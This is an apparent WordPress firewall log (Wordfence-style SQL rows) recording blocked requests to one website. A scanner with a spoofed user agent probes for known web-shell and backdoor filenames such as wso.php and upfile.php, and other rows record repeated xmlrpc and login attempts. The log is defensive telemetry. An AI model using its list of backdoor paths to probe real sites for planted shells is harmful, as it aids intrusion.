(50796, 1711999822.742749, 1711999821.958400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/inc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luYy5waHA=","category":"brute-force","ssl":1}'),
(50767, 1711962174.476202, 1711962173.794300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/about.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50768, 1711962170.411716, 1711962169.639100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/travel/issue.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3RyYXZlbC9pc3N1ZS5waHA=","category":"brute-force","ssl":1}'),
(50795, 1711999842.903416, 1711999842.281700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/lv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x2LnBocA==","category":"brute-force","ssl":1}'),
(50769, 1711962164.750753, 1711962163.945500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/aahana/json.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2FhaGFuYS9qc29uLnBocA==","category":"brute-force","ssl":1}'),
(50794, 1711999848.117368, 1711999847.419400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/seo.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Nlby5waHA=","category":"brute-force","ssl":1}'),
(50770, 1711962161.542294, 1711962160.950300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/travelscape/json.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3RyYXZlbHNjYXBlL2pzb24ucGhw","category":"brute-force","ssl":1}'),
(50771, 1711974888.611038, 1711974887.723600, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvaW5wdXRzLnBocA==","category":"brute-force","ssl":1}'),
(50772, 1711974873.284058, 1711974872.478100, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(50773, 1711974861.051708, 1711974860.475500, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-includes/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(50843, 1712062386.732194, 1712062386.259600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(50793, 1711999859.023837, 1711999858.491800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3gucGhw","category":"brute-force","ssl":1}'),
(50774, 1711974850.161906, 1711974848.880800, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.com/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(50775, 0.000000, 1711992951.157355, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Apache-HttpClient/4.5.13 (Java/11.0.22)', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50776, 1711992970.508592, 1711992969.046700, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.google.com', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50777, 1711992967.696688, 1711992966.451000, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.google.com', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50778, 1711992964.853095, 1711992963.814800, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Apache-HttpClient/4.5.13 (Java/11.0.22)', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50779, 1711992959.883333, 1711992958.382200, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Apache-HttpClient/4.5.13 (Java/11.0.22)', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50780, 1711992957.072691, 1711992955.677200, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Apache-HttpClient/4.5.13 (Java/11.0.22)', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50781, 1711992954.436753, 1711992953.466300, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝžˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Apache-HttpClient/4.5.13 (Java/11.0.22)', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50782, 1712000088.433743, 1712000087.659900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50849, 1712062375.375864, 1712062374.829800, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50783, 1712000063.607490, 1712000062.826700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50784, 1712000046.721504, 1712000046.245300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(50785, 1712000020.629761, 1712000020.164700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(50848, 1712062376.774746, 1712062376.224200, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(50786, 1711999999.264209, 1711999998.785800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50898, 1712082228.123750, 1712082227.670900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/cloud.php/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocC93c28ucGhw","category":"brute-force","ssl":1}'),
(50787, 1711999980.035574, 1711999979.567000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(50840, 1712062392.977609, 1712062392.491500, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50788, 1711999963.478481, 1711999963.053200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(50789, 1711999932.846649, 1711999932.303900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzby5waHA=","category":"brute-force","ssl":1}'),
(50790, 1711999915.082901, 1711999914.616100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/cloud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocA==","category":"brute-force","ssl":1}'),
